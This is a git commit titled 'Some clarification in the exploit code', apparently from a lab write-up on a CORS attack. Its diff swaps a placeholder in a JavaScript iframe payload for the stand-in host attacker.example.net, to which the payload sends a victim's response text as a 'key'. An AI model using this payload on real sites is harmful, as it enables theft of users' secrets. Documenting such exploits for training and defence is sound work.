Some clarification in the exploit code

This commit is contained in:
Emanuel Duss 2020-04-12 14:38:52 +02:00
parent 4537555714
commit 48fcdeb7ca

View File

@ -112,7 +112,7 @@ origin in the request:
req.send(); req.send();
function reqListener() { function reqListener() {
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText); location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
}; };
</script>"></iframe> </script>"></iframe>
``` ```